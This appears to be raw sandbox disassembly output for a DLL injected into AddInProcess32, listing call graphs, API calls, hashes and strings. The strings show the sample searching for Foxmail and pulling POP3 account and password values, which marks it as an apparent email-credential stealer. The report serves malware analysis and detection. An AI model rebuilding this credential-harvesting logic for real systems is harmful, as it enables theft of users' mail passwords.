10004669 _abort 5 API calls 6308->6314 6309 10004a82 6338 10004ab4 6309->6338 6310 10004aae 6312 1000bdc9 _abort 5 API calls 6310->6312 6317 10004ab3 6312->6317 6314->6301 6319 100049b3 6318->6319 6319->6304 6320 10004b39 GetModuleHandleExW 6319->6320 6321 10004b63 GetProcAddress 6320->6321 6322 10004b78 6320->6322 6321->6322 6323 10004b95 6322->6323 6324 10004b8c FreeLibrary 6322->6324 6325 10002ada _ValidateLocalCookies 5 API calls 6323->6325 6324->6323 6326 10004b9f 6325->6326 6326->6304 6327->6307 6346 10005132 6328->6346 6332 10004698 6331->6332 6333 10002ada _ValidateLocalCookies 5 API calls 6332->6333 6334 100046c1 6333->6334 6334->6308 6368 100056b9 RtlLeaveCriticalSection 6335->6368 6337 10004a7e 6337->6309 6337->6310 6369 10006025 6338->6369 6341 10004ae2 6344 10004b39 _abort 8 API calls 6341->6344 6342 10004ac2 GetPEB 6342->6341 6343 10004ad2 GetCurrentProcess TerminateProcess 6342->6343 6343->6341 6345 10004aea ExitProcess 6344->6345 6349 100050e1 6346->6349 6348 10005156 6348->6306 6350 100050ed ___scrt_is_nonwritable_in_current_image 6349->6350 6357 10005671 RtlEnterCriticalSection 6350->6357 6352 100050fb 6358 1000515a 6352->6358 6356 10005119 _abort 6356->6348 6357->6352 6361 10005182 6358->6361 6362 1000517a 6358->6362 6359 10002ada _ValidateLocalCookies 5 API calls 6360 10005108 6359->6360 6364 10005126 6360->6364 6361->6362 6363 1000571e _free 20 API calls 6361->6363 6362->6359 6363->6362 6367 100056b9 RtlLeaveCriticalSection 6364->6367 6366 10005130 6366->6356 6367->6366 6368->6337 6370 10006040 6369->6370 6371 1000604a 6369->6371 6373 10002ada _ValidateLocalCookies 5 API calls 6370->6373 6372 10005c45 _abort 5 API calls 6371->6372 6372->6370 6374 10004abe 6373->6374 6374->6341 6374->6342 6375 10001f3f 6376 10001f4b ___scrt_is_nonwritable_in_current_image 6375->6376 6393 1000247c 6376->6393 6378 10001f52 6379 10002041 6378->6379 6380 10001f7c 6378->6380 6387 10001f57 ___scrt_is_nonwritable_in_current_image 6378->6387 6416 10002639 IsProcessorFeaturePresent 6379->6416 6404 100023de 6380->6404 6383 10002048 6384 10001f8b __RTC_Initialize 6384->6387 6407 100022fc RtlInitializeSListHead 6384->6407 6386 10001f99 ___scrt_initialize_default_local_stdio_options 6408 100046c5 6386->6408 6391 10001fb8 6391->6387 6392 10004669 _abort 5 API calls 6391->6392 6392->6387 6394 10002485 6393->6394 6420 10002933 IsProcessorFeaturePresent 6394->6420 6398 1000249a 6398->6378 6399 10002496 6399->6398 6431 100053c8 6399->6431 6402 100024b1 6402->6378 6505 100024b5 6404->6505 6406 100023e5 6406->6384 6407->6386 6409 100046dc 6408->6409 6410 10002ada _ValidateLocalCookies 5 API calls 6409->6410 6411 10001fad 6410->6411 6411->6387 6412 100023b3 6411->6412 6413 100023b8 ___scrt_release_startup_lock 6412->6413 6414 10002933 ___isa_available_init IsProcessorFeaturePresent 6413->6414 6415 100023c1 6413->6415 6414->6415 6415->6391 6417 1000264e ___scrt_fastfail 6416->6417 6418 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6417->6418 6419 10002744 ___scrt_fastfail 6418->6419 6419->6383 6421 10002491 6420->6421 6422 100034ea 6421->6422 6423 100034ef ___vcrt_initialize_winapi_thunks 6422->6423 6442 10003936 6423->6442 6427 10003505 6428 10003510 6427->6428 6456 10003972 6427->6456 6428->6399 6430 100034fd 6430->6399 6497 10007457 6431->6497 6434 10003529 6435 10003532 6434->6435 6436 10003543 6434->6436 6437 1000391b ___vcrt_uninitialize_ptd 6 API calls 6435->6437 6436->6398 6438 10003537 6437->6438 6439 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6438->6439 6440 1000353c 6439->6440 6501 10003c50 6440->6501 6443 1000393f 6442->6443 6445 10003968 6443->6445 6446 100034f9 6443->6446 6460 10003be0 6443->6460 6447 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6445->6447 6446->6430 6448 100038e8 6446->6448 6447->6446 6478 10003af1 6448->6478 6451 100038fd 6451->6427 6454 10003918 6454->6427 6457 1000399c 6456->6457 6458 1000397d 6456->6458 6457->6430 6459 10003987 RtlDeleteCriticalSection 6458->6459 6459->6457 6459->6459 6465 10003a82 6460->6465 6462 10003bfa 6463 10003c18 InitializeCriticalSectionAndSpinCount 6462->6463 6464 10003c03 6462->6464 6463->6464 6464->6443 6466 10003aa6 __crt_fast_encode_pointer 6465->6466 6467 10003aaa 6465->6467 6466->6462 6467->6466 6471 100039be 6467->6471 6470 10003ac4 GetProcAddress 6470->6466 6476 100039cd try_get_first_available_module 6471->6476 6472 10003a77 6472->6466 6472->6470 6473 100039ea LoadLibraryExW 6474 10003a05 GetLastError 6473->6474 6473->6476 6474->6476 6475 10003a60 FreeLibrary 6475->6476 6476->6472 6476->6473 6476->6475 6477 10003a38 LoadLibraryExW 6476->6477 6477->6476 6479 10003a82 try_get_function 5 API calls 6478->6479 6480 10003b0b 6479->6480 6481 10003b24 TlsAlloc 6480->6481 6482 100038f2 6480->6482 6482->6451 6483 10003ba2 6482->6483 6484 10003a82 try_get_function 5 API calls 6483->6484 6485 10003bbc 6484->6485 6486 10003bd7 TlsSetValue 6485->6486 6487 1000390b 6485->6487 6486->6487 6487->6454 6488 1000391b 6487->6488 6489 1000392b 6488->6489 6490 10003925 6488->6490 6489->6451 6492 10003b2c 6490->6492 6493 10003a82 try_get_function 5 API calls 6492->6493 6494 10003b46 6493->6494 6495 10003b5e TlsFree 6494->6495 6496 10003b52 6494->6496 6495->6496 6496->6489 6500 10007470 6497->6500 6498 10002ada _ValidateLocalCookies 5 API calls 6499 100024a3 6498->6499 6499->6402 6499->6434 6500->6498 6502 10003c7f 6501->6502 6503 10003c59 6501->6503 6502->6436 6503->6502 6504 10003c69 FreeLibrary 6503->6504 6504->6503 6506 100024c4 6505->6506 6507 100024c8 6505->6507 6506->6406 6508 10002639 ___scrt_fastfail 4 API calls 6507->6508 6510 100024d5 ___scrt_release_startup_lock 6507->6510 6509 10002559 6508->6509 6510->6406 7477 100067bf 7482 100067f4 7477->7482 7480 100067db 7481 1000571e _free 20 API calls 7481->7480 7483 10006806 7482->7483 7492 100067cd 7482->7492 7484 10006836 7483->7484 7485 1000680b 7483->7485 7484->7492 7493 100071d6 7484->7493 7486 1000637b _abort 20 API calls 7485->7486 7488 10006814 7486->7488 7489 1000571e _free 20 API calls 7488->7489 7489->7492 7490 10006851 7491 1000571e _free 20 API calls 7490->7491 7491->7492 7492->7480 7492->7481 7494 100071e1 7493->7494 7495 10007209 7494->7495 7496 100071fa 7494->7496 7499 10007218 7495->7499 7502 10008a98 7495->7502 7497 10006368 _free 20 API calls 7496->7497 7501 100071ff ___scrt_fastfail 7497->7501 7509 10008acb 7499->7509 7501->7490 7503 10008aa3 7502->7503 7504 10008ab8 RtlSizeHeap 7502->7504 7505 10006368 _free 20 API calls 7503->7505 7504->7499 7506 10008aa8 7505->7506 7507 100062ac _abort 26 API calls 7506->7507 7508 10008ab3 7507->7508 7508->7499 7510 10008ae3 7509->7510 7511 10008ad8 7509->7511 7513 10008aeb 7510->7513 7519 10008af4 _abort 7510->7519 7512 100056d0 21 API calls 7511->7512 7518 10008ae0 7512->7518 7516 1000571e _free 20 API calls 7513->7516 7514 10008af9 7517 10006368 _free 20 API calls 7514->7517 7515 10008b1e RtlReAllocateHeap 7515->7518 7515->7519 7516->7518 7517->7518 7518->7501 7519->7514 7519->7515 7520 1000474f _abort 7 API calls 7519->7520 7520->7519 7848 10005bff 7856 10005d5c 7848->7856 7851 10005c13 7852 10005b7a _abort 20 API calls 7853 10005c1b 7852->7853 7854 10005c28 7853->7854 7855 10005c2b 11 API calls 7853->7855 7855->7851 7857 10005c45 _abort 5 API calls 7856->7857 7858 10005d83 7857->7858 7859 10005d9b TlsAlloc 7858->7859 7860 10005d8c 7858->7860 7859->7860 7861 10002ada _ValidateLocalCookies 5 API calls 7860->7861 7862 10005c09 7861->7862 7862->7851 7862->7852

                                            Control-flow Graph

                                            APIs
                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                            • FindClose.KERNEL32(00000000), ref: 100011DB
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                            • String ID:
                                            • API String ID: 1083526818-0
                                            • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                            • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                            • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                            • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                            Control-flow Graph

                                            APIs
                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                              • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                              • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                              • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                              • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                            • lstrlenW.KERNEL32(?), ref: 100014C5
                                            • lstrlenW.KERNEL32(?), ref: 100014E0
                                            • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                            • lstrcatW.KERNEL32(00000000), ref: 10001521
                                            • lstrlenW.KERNEL32(?,?), ref: 10001547
                                            • lstrcatW.KERNEL32(00000000), ref: 10001553
                                            • lstrlenW.KERNEL32(?,?), ref: 10001579
                                            • lstrcatW.KERNEL32(00000000), ref: 10001585
                                            • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                            • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                            • String ID: )$Foxmail$ProgramFiles
                                            • API String ID: 672098462-2938083778
                                            • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                            • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                            • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                            • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                            Control-flow Graph

                                            APIs
                                            • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                              • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                              • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProcProtectVirtual
                                            • String ID:
                                            • API String ID: 2099061454-0
                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                            • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                            • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 79 1000c7a7-1000c7bc 80 1000c82d 79->80 81 1000c7be-1000c7c6 79->81 83 1000c82f-1000c833 80->83 81->80 82 1000c7c8-1000c7f6 call 1000c7e6 81->82 91 1000c7f8 82->91 92 1000c86c-1000c86e 82->92 85 1000c872 call 1000c877 83->85 86 1000c835-1000c83d GetModuleHandleA 83->86 89 1000c83f-1000c847 86->89 89->89 90 1000c849-1000c84c 89->90 90->83 93 1000c84e-1000c850 90->93 96 1000c7fa-1000c7fe 91->96 97 1000c85b-1000c85e 91->97 94 1000c870 92->94 95 1000c866-1000c86b 92->95 98 1000c852-1000c854 93->98 99 1000c856-1000c85a 93->99 94->90 95->92 102 1000c865 96->102 103 1000c800-1000c80b GetProcAddress 96->103 100 1000c85f-1000c860 GetProcAddress 97->100 98->100 99->97 100->102 102->95 103->80 104 1000c80d-1000c81a VirtualProtect 103->104 105 1000c82c 104->105 106 1000c81c-1000c82a VirtualProtect 104->106 105->80 106->105
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                              • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                              • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProcProtectVirtual
                                            • String ID:
                                            • API String ID: 2099061454-0
                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                            • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                            • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 107 1000c803-1000c80b GetProcAddress 108 1000c82d 107->108 109 1000c80d-1000c81a VirtualProtect 107->109 112 1000c82f-1000c833 108->112 110 1000c82c 109->110 111 1000c81c-1000c82a VirtualProtect 109->111 110->108 111->110 113 1000c872 call 1000c877 112->113 114 1000c835-1000c83d GetModuleHandleA 112->114 116 1000c83f-1000c847 114->116 116->116 117 1000c849-1000c84c 116->117 117->112 118 1000c84e-1000c850 117->118 119 1000c852-1000c854 118->119 120 1000c856-1000c85e 118->120 121 1000c85f-1000c865 GetProcAddress 119->121 120->121 124 1000c866-1000c86e 121->124 126 1000c870 124->126 126->117
                                            APIs
                                            • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                            • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                            • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: AddressProcProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 2152742572-0
                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                            • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                            • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                            APIs
                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                            • String ID:
                                            • API String ID: 3906539128-0
                                            • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                            • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                            • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                            • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                            • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                            • ExitProcess.KERNEL32 ref: 10004AEE
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                            • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                            • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                            • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .
                                            • API String ID: 0-248832578
                                            • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                            • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                            • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                            • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: HeapProcess
                                            • String ID:
                                            • API String ID: 54951025-0
                                            • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                            • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                            • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                            • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 136 1000173a-100017fe call 1000c030 call 10002c40 * 2 143 10001803 call 10001cca 136->143 144 10001808-1000180c 143->144 145 10001812-10001816 144->145 146 100019ad-100019b1 144->146 145->146 147 1000181c-10001837 call 10001ede 145->147 150 1000183d-10001845 147->150 151 1000199f-100019ac call 10001ee7 * 2 147->151 153 10001982-10001985 150->153 154 1000184b-1000184e 150->154 151->146 156 10001995-10001999 153->156 157 10001987 153->157 154->153 158 10001854-10001881 call 100044b0 * 2 call 10001db7 154->158 156->150 156->151 161 1000198a-1000198d call 10002c40 157->161 170 10001887-1000189f call 100044b0 call 10001db7 158->170 171 1000193d-10001943 158->171 166 10001992 161->166 166->156 170->171 187 100018a5-100018a8 170->187 172 10001945-10001947 171->172 173 1000197e-10001980 171->173 172->173 175 10001949-1000194b 172->175 173->161 177 10001961-1000197c call 100016aa 175->177 178 1000194d-1000194f 175->178 177->166 180 10001951-10001953 178->180 181 10001955-10001957 178->181 180->177 180->181 184 10001959-1000195b 181->184 185 1000195d-1000195f 181->185 184->177 184->185 185->173 185->177 188 100018c4-100018dc call 100044b0 call 10001db7 187->188 189 100018aa-100018c2 call 100044b0 call 10001db7 187->189 188->156 198 100018e2-1000193b call 100016aa call 100015da call 10002c40 * 2 188->198 189->188 189->198 198->156
                                            APIs
                                              • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                              • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                              • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                            • _strlen.LIBCMT ref: 10001855
                                            • _strlen.LIBCMT ref: 10001869
                                            • _strlen.LIBCMT ref: 1000188B
                                            • _strlen.LIBCMT ref: 100018AE
                                            • _strlen.LIBCMT ref: 100018C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _strlen$File$CopyCreateDelete
                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                            • API String ID: 3296212668-3023110444
                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                            • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                            • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000F.00000002.3342349571.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 0000000F.00000002.3342305920.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000F.00000002.3342349571.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_15_2_10000000_AddInProcess32.jbxd
                                            Similarity
                                            • API ID: _strlen
                                            • String ID: %m$~$Gon~$~F@7$~dra
                                            • API String ID: 4218353326-230879103
                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                            • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                            • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
